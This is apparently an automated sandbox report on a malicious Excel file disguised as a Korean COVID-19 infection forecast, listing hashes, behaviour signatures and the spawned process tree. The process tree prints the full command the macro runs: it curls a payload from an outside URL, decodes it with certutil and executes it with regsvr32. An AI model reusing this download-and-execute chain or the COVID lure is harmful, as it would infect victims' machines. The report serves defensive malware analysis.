Analysis

  • max time kernel
    63s
  • max time network
    32s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    13-07-2020 10:39

General

  • Target

    COVID-19 감염자 및 사망자 예측.xls

  • Size

    1.1MB

  • MD5

    268efe92a6e16c89e62bf0c32113d0c9

  • SHA1

    d42d766a18fc56170ff2978a2bf07bd9cafac3e8

  • SHA256

    00e82dd014370c9db5a95fd0fd3a5438e4a51f4d64a15ddffaa77f2e806d2a74

  • SHA512

    ae272d7d2569afed6e058bd8ebd78adbebd88d60501f9ccc011d0fe1df41a7a5cb5e619b504aafafc23c02dd873f39a279f8939b8ba79b7815fad96bc29fd7f4

Score
10/10

Malware Config

Signatures

  • Modifies registry class 280 IoCs
  • Delays execution with timeout.exe 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious use of WriteProcessMemory 17 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present

Processes

  • C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\COVID-19 감염자 및 사망자 예측.xls"
    1⤵
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1456
    • C:\Windows\system32\cmd.exe
      cmd /c curl "http://refeeldominicana.nwideas.com/wp-content/uploads/chimps/category.php" -o "%temp%\1.tmp"&certutil -decode "%temp%\1.tmp" "%temp%\lk.tmp"&cmd /c del "%temp%\1.tmp"&timeout 60&regsvr32 /s "%temp%\lk.tmp"
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:744
      • C:\Windows\system32\certutil.exe
        certutil -decode "C:\Users\Admin\AppData\Local\Temp\1.tmp" "C:\Users\Admin\AppData\Local\Temp\lk.tmp"
        3⤵
        PID:1100
      • C:\Windows\system32\cmd.exe
        cmd /c del "C:\Users\Admin\AppData\Local\Temp\1.tmp"
        3⤵
        PID:1088
      • C:\Windows\system32\timeout.exe
        timeout 60
        3⤵
        • Delays execution with timeout.exe
        PID:1076
      • C:\Windows\system32\regsvr32.exe
        regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\lk.tmp"
        3⤵
        • Suspicious behavior: CmdExeWriteProcessMemorySpam
        PID:1940

Network

MITRE ATT&CK Matrix

Downloads

  • memory/1456-0-0x0000000007DB0000-0x0000000007FB0000-memory.dmp

    Filesize

    2.0MB

  • memory/1456-1-0x0000000007DB0000-0x0000000007FB0000-memory.dmp

    Filesize

    2.0MB